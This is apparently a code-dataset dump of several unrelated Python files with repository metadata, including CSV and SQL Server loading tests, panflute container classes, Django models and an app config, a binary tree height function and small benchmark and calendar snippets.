self.assertEqual(CsvFile("c:\\temp\\test.csv").full_file_name, "c:\\temp\\test.csv")
def test_full_extension_property(self):
self.assertEqual(CsvFile("c:\\temp\\test.csv").extension, "csv")
def test_mark_file_as_done_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('done')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_done()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".done"), True)
def test_mark_file_as_fail_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('fail')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_fail()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".fail"), True)
def test_mark_file_as_nodata_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('nodata')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_nodata()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".nodata"), True)
def test_get_total_line_count_for_file_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup(sub_directory="file_info", content="1\n2\n")
self.assertEqual(
CsvFile(full_file_name_list[0]).get_total_line_count_for_file(),
2
)
def test_mark_file_as_ready_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready', '.done')
result = CsvFile(full_file_name_list[0]).mark_file_as_ready()
self.assertEqual(result, True)
self.assertEqual(os.path.exists(os.path.splitext(full_file_name_list[0])[0]), True)
def test_to_sql_server_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready1', '', content="seconds|minutes\n3600|12\n")
return_dict = CsvFile.to_sql_server(
pandas_dataframe=CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header(),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server"
)
)
self.assertEqual(["SECONDS", "MINUTES", 'AUDIT_CREATE_UTC_DATETIME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_to_sql_server_with_additional_static_info_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready1', '', content="seconds|minutes\n3600|12\n")
return_dict = CsvFile.to_sql_server(
pandas_dataframe=CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header(),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server2"
),
additional_static_data_dict={'static_field1': 'some info 1', 'static_field2': 'some info 2'}
)
self.assertEqual(['SECONDS', 'MINUTES', 'STATIC_FIELD1', 'STATIC_FIELD2', 'AUDIT_CREATE_UTC_DATETIME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_to_sql_server_with_chunking_method(self):
AppLogger.set_debug_level()
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready2', '',
content="seconds|minutes\n3600|12\n3600|13\n3600|14\n3600|15\n3600|16\n")
csv_file = CsvFile(full_file_name_list[0])
return_dict = CsvFile(full_file_name_list[0]).to_sql_server_with_chunking(
pandas_dataframe_chunks=csv_file.get_dataframe_windows_encoding_with_header_and_chunking(batch_size=2),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server3",
)
)
self.assertEqual(["SECONDS", "MINUTES", 'AUDIT_CREATE_UTC_DATETIME', 'CSV_FILE_NAME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_save_dataframe_method(self):
csv_file = CsvFile(r"c:\temp\test.csv")
df_expected = pd.DataFrame({'seconds': [3600], 'minutes': [10]}, columns=['seconds', 'minutes'])
csv_file.save_dataframe(df_expected)
df_actual = pd.read_csv(r"c:\temp\test.csv", sep="|")
assert_frame_equal(df_actual, df_expected)
if __name__ == '__main__':
unittest.main()
| 50.694915 | 149 | 0.690516 | 1,170 | 8,973 | 4.863248 | 0.133333 | 0.063269 | 0.088576 | 0.104042 | 0.78348 | 0.745343 | 0.700879 | 0.688225 | 0.637961 | 0.617926 | 0 | 0.02225 | 0.188566 | 8,973 | 176 | 150 | 50.982955 | 0.759236 | 0.005126 | 0 | 0.279412 | 0 | 0.007353 | 0.125297 | 0.053925 | 0 | 0 | 0 | 0 | 0.220588 | 1 | 0.169118 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
86eab53612ebaf581b877e4e75d7e2dc2f2e2320 | 103 | py | Python | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | from core import Core
class Tx:
def __init__(self):
self.core = Core()
tx = Tx()
| 12.875 | 26 | 0.543689 | 14 | 103 | 3.714286 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.349515 | 103 | 7 | 27 | 14.714286 | 0.776119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
86fd210a10933ec93d4a4b2c057f9647b3353006 | 459 | py | Python | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | 2 | 2022-03-29T16:51:52.000Z | 2022-03-30T13:23:23.000Z | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | 56 | 2022-03-25T09:12:42.000Z | 2022-03-31T14:01:54.000Z | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from pathlib import Path
from typing import Optional
from eth_account.signers.local import LocalAccount
from beamer.contracts import DeploymentInfo
from beamer.typing import URL
@dataclass
class Config:
account: LocalAccount
deployment_info: DeploymentInfo
l1_rpc_url: URL
l2a_rpc_url: URL
l2b_rpc_url: URL
token_match_file: Path
fill_wait_time: int
prometheus_metrics_port: Optional[int]
| 21.857143 | 50 | 0.793028 | 62 | 459 | 5.645161 | 0.564516 | 0.051429 | 0.077143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007895 | 0.172113 | 459 | 20 | 51 | 22.95 | 0.913158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.375 | 0 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8104b4bdce0eba8be4737fc520b6ace52e05d736 | 5,054 | py | Python | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | """
These containers keep track of the identity of the parent
object, and the attribute of the parent object that they correspond to.
"""
# ---------------------------
# Imports
# ---------------------------
import sys
py2 = sys.version_info[0] == 2
if py2: str = basestring
if py2:
from collections import OrderedDict, MutableSequence, MutableMapping
else:
from collections import OrderedDict
from collections.abc import MutableSequence, MutableMapping
from .utils import check_type, encode_dict # check_group
# ---------------------------
# Container Classes
# ---------------------------
# These are list and OrderedDict containers that
# (a) track the identity of their parents, and
# (b) track the parent's property where they are stored
# They attach these two to the elements requested through __getattr__
class ListContainer(MutableSequence):
"""
Wrapper around a list, to track the elements' parents.
**This class shouldn't be instantiated directly by users,
but by the elements that contain it**.
:param args: elements contained in the list--like object
:param oktypes: type or tuple of types that are allowed as items
:type oktypes: ``type`` | ``tuple``
:param parent: the parent element
:type parent: ``Element``
:param container: None, unless the element is not part of its .parent.content (this is the case for table headers for instance, which are not retrieved with table.content but with table.header)
:type container: ``str`` | None
"""
# Based on http://stackoverflow.com/a/3488283
# See also https://docs.python.org/3/library/collections.abc.html
__slots__ = ['list', 'oktypes', 'parent', 'location']
def __init__(self, *args, oktypes=object, parent=None):
self.oktypes = oktypes
self.parent = parent
self.location = None # Cannot be set through __init__
self.list = []
self.extend(args) # self.oktypes must be set first
def __contains__(self, item):
return item in self.list
def __len__(self):
return len(self.list)
def __getitem__(self, i):
if isinstance(i, int):
return attach(self.list[i], self.parent, self.location)
else:
newlist = self.list.__getitem__(i)
obj = ListContainer(*newlist,
oktypes=self.oktypes, parent=self.parent)
obj.location = self.location
return obj
def __delitem__(self, i):
del self.list[i]
def __setitem__(self, i, v):
v = check_type(v, self.oktypes)
self.list[i] = v
def insert(self, i, v):
v = check_type(v, self.oktypes)
self.list.insert(i, v)
def __str__(self):
return self.__repr__()
def __repr__(self):
return 'ListContainer({})'.format(' '.join(repr(x) for x in self.list))
def to_json(self):
return [to_json_wrapper(item) for item in self.list]
class DictContainer(MutableMapping):
"""
Wrapper around a dict, to track the elements' parents.
**This class shouldn't be instantiated directly by users,
but by the elements that contain it**.
:param args: elements contained in the dict--like object
:param oktypes: type or tuple of types that are allowed as items
:type oktypes: ``type`` | ``tuple``
:param parent: the parent element
:type parent: ``Element``
"""
__slots__ = ['dict', 'oktypes', 'parent', 'location']
def __init__(self, *args, oktypes=object, parent=None, **kwargs):
self.oktypes = oktypes
self.parent = parent
self.location = None
self.dict = OrderedDict()
self.update(args) # Must be a sequence of tuples
self.update(kwargs) # Order of kwargs is not preserved
def __contains__(self, item):
return item in self.dict
def __len__(self):
return len(self.dict)
def __getitem__(self, k):
return attach(self.dict[k], self.parent, self.location)
def __delitem__(self, k):
del self.dict[k]
def __setitem__(self, k, v):
v = check_type(v, self.oktypes)
self.dict[k] = v
def __str__(self):
return self.__repr__()
def __repr__(self):
return 'DictContainer({})'.format(' '.join(repr(x) for x in self.dict))
def __iter__(self):
return self.dict.__iter__()
def to_json(self):
items = self.dict.items()
return OrderedDict((k, to_json_wrapper(v)) for k, v in items)
# ---------------------------
# Functions
# ---------------------------
def attach(element, parent, location):
if not isinstance(element, (int, str, bool)):
element.parent = parent
element.location = location
else:
print(element, 'has no parent')
return element
def to_json_wrapper(e):
if isinstance(e, str):
return e
elif isinstance(e, bool):
return encode_dict('MetaBool', e)
else:
return e.to_json()
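# --- Illustrative sketch (editor's addition, not part of the original module) ---
# A minimal, hypothetical demonstration of the parent tracking described in the
# ListContainer docstring. ``_FakeElement`` is a stand-in for a real panflute
# element; it only needs writable ``parent`` and ``location`` attributes.
def _sketch_parent_tracking():
    class _FakeElement:
        def __init__(self):
            self.parent = None
            self.location = None

    owner = _FakeElement()
    child = _FakeElement()
    items = ListContainer(child, oktypes=_FakeElement, parent=owner)
    # Indexing goes through attach(), which stamps the container's parent
    # and location onto the retrieved element.
    assert items[0].parent is owner
    return items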
| 29.905325 | 197 | 0.622477 | 646 | 5,054 | 4.687307 | 0.252322 | 0.02642 | 0.023778 | 0.010898 | 0.356341 | 0.356341 | 0.341149 | 0.341149 | 0.292602 | 0.259577 | 0 | 0.003405 | 0.244559 | 5,054 | 168 | 198 | 30.083333 | 0.78968 | 0.348635 | 0 | 0.284091 | 0 | 0 | 0.033743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.056818 | 0.125 | 0.568182 | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
81052ab68524c0862cd11da15370bdda191089a4 | 140 | py | Python | django/CVE-2021-35042/web/vuln/apps.py | nobgr/vulhub | b24a89459fbd98ba76881adb6d4e2fb376792863 | [
"MIT"
] | 9,681 | 2017-09-16T12:31:59.000Z | 2022-03-31T23:49:31.000Z | django/CVE-2021-35042/web/vuln/apps.py | starkxun/vulhub | e5c1b204a6bf1e27d654569ec963329486f230e6 | [
"MIT"
] | 180 | 2017-11-01T08:05:07.000Z | 2022-03-31T05:26:33.000Z | django/CVE-2021-35042/web/vuln/apps.py | starkxun/vulhub | e5c1b204a6bf1e27d654569ec963329486f230e6 | [
"MIT"
] | 3,399 | 2017-09-16T12:21:54.000Z | 2022-03-31T12:28:48.000Z | from django.apps import AppConfig
class VulnConfig(AppConfig):
name = 'vuln'
default_auto_field = 'django.db.models.BigAutoField'
| 20 | 56 | 0.75 | 17 | 140 | 6.058824 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 140 | 6 | 57 | 23.333333 | 0.872881 | 0 | 0 | 0 | 0 | 0 | 0.235714 | 0.207143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
811fb08146675ce608fef97368865a1b0650aaa2 | 80 | py | Python | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 13 | 2020-01-04T07:37:38.000Z | 2021-08-31T05:19:58.000Z | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 3 | 2020-06-05T22:42:53.000Z | 2020-08-24T07:18:54.000Z | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 9 | 2020-10-19T04:53:06.000Z | 2021-08-31T05:20:01.000Z |
import calendar
c = calendar.TextCalendar(calendar.SUNDAY)
c.prmonth(2017, 7)
| 13.333333 | 42 | 0.775 | 11 | 80 | 5.636364 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070423 | 0.1125 | 80 | 5 | 43 | 16 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
81330c931de8a17bf78139d00524331d06347cce | 936 | py | Python | python/ds/heightBinaryTree.py | unhingedporter/DataStructureMustKnow | 3c5b3225afa2775d37a2ff90121f73208717640a | [
"MIT"
] | 3 | 2019-11-23T08:43:58.000Z | 2019-11-23T08:52:53.000Z | python/ds/heightBinaryTree.py | unhingedpotter/DSMustKnow | 64958cbbbb3f4cdb1104c2255e555233554503f9 | [
"MIT"
] | null | null | null | python/ds/heightBinaryTree.py | unhingedpotter/DSMustKnow | 64958cbbbb3f4cdb1104c2255e555233554503f9 | [
"MIT"
] | null | null | null | # Find height of a given binary tree
class Node():
def __init__(self, value):
self.left = None
self.right = None
self.value = value
class Tree():
def height(self, node: Node):
if node is None or (node.left is None and node.right is None):
return 0
else:
left_sub_tree_height = self.height(node.left)
right_sub_tree_height = self.height(node.right)
return max(left_sub_tree_height, right_sub_tree_height) + 1
n = Node(15)
n.left = Node(10)
n.right = Node(20)
n.left.right = Node(12)
n.right.left = Node(18)
n.right.right = Node(30)
# Creating left skewed tree
n1 = Node(5)
n1.left = Node(0)
n1.left.left = Node(0)
n1.left.left.left = Node(0)
n1.left.left.left.left = Node(0)
n1.left.left.left.left.left = Node(0)
n1.left.left.left.left.left.left = Node(0)
n.left.left = n1
print(f'The height of the tree is {Tree().height(n)}')
| 21.272727 | 71 | 0.634615 | 160 | 936 | 3.6125 | 0.25 | 0.221453 | 0.207612 | 0.16609 | 0.307958 | 0.307958 | 0.195502 | 0.179931 | 0.153979 | 0.153979 | 0 | 0.040334 | 0.231838 | 936 | 43 | 72 | 21.767442 | 0.763561 | 0.064103 | 0 | 0 | 0 | 0 | 0.050401 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.214286 | 0.035714 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
813df2208329c1eed93b0b636e383fdd4e7a6884 | 2,077 | py | Python | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | 5 | 2022-03-14T21:15:20.000Z | 2022-03-22T10:11:58.000Z | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | null | null | null | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | null | null | null | from django.db import models
from accounts.models import Account
from store.models import Product
class Order(models.Model):
STATUS = (
('New', 'Nuevo'),
('Accepted', 'Aceptado'),
('Completed', 'Completado'),
('Cancel', 'Cancelado'),
)
user = models.ForeignKey(Account, on_delete=models.CASCADE, null=True)
order_number = models.CharField(max_length=20)
first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
phone = models.CharField(max_length=50)
email = models.CharField(max_length=50)
addres_line_1 = models.CharField(max_length=100)
addres_line_2 = models.CharField(max_length=100)
state = models.CharField(max_length=50)
city = models.CharField(max_length=50)
country = models.CharField(max_length=50)
order_note = models.CharField(max_length=100, blank=True)
order_total = models.FloatField()
tax = models.FloatField()
status = models.CharField(max_length=50, choices=STATUS, default='New')
ip = models.CharField(blank=True, max_length=20)
is_ordered = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def full_name(self):
return f'{self.first_name} {self.last_name}'
def full_address(self):
return f'{self.addres_line_1} {self.addres_line_2}'
def __str__(self):
return self.first_name
class OrderProduct(models.Model):
order = models.ForeignKey(Order, on_delete=models.CASCADE)
user = models.ForeignKey(Account, on_delete=models.CASCADE)
product = models.ForeignKey(Product, on_delete=models.CASCADE)
quantity = models.IntegerField()
product_price = models.FloatField()
ordered = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def subtotal(self):
return self.product_price * self.quantity
def __str__(self):
return self.product.product_name
| 35.20339 | 75 | 0.714011 | 265 | 2,077 | 5.381132 | 0.29434 | 0.136746 | 0.151473 | 0.201964 | 0.47195 | 0.2777 | 0.235624 | 0.235624 | 0.168303 | 0.168303 | 0 | 0.01922 | 0.173327 | 2,077 | 58 | 76 | 35.810345 | 0.811299 | 0 | 0 | 0.125 | 0 | 0 | 0.065479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104167 | false | 0 | 0.0625 | 0.104167 | 0.895833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d49cd26aa57849731f642d65c31a4c763b7dff77 | 87 | py | Python | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | from django import forms
class UploadForm(forms.Form):
upload = forms.FileField()
| 17.4 | 30 | 0.747126 | 11 | 87 | 5.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16092 | 87 | 4 | 31 | 21.75 | 0.890411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d4a4d2f9c7dcf14b818e14bd146d3520a0c0d7ee | 137 | py | Python | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | 1 | 2020-04-21T07:33:42.000Z | 2020-04-21T07:33:42.000Z | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | 4 | 2020-02-03T18:54:32.000Z | 2020-05-13T18:28:28.000Z | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | null | null | null | from pyperformance.benchmarks.bm_mdp import bench_mdp
def faasm_main():
bench_mdp(1)
if __name__ == "__main__":
faasm_main()
| 13.7 | 53 | 0.722628 | 19 | 137 | 4.526316 | 0.684211 | 0.186047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.175182 | 137 | 9 | 54 | 15.222222 | 0.752212 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |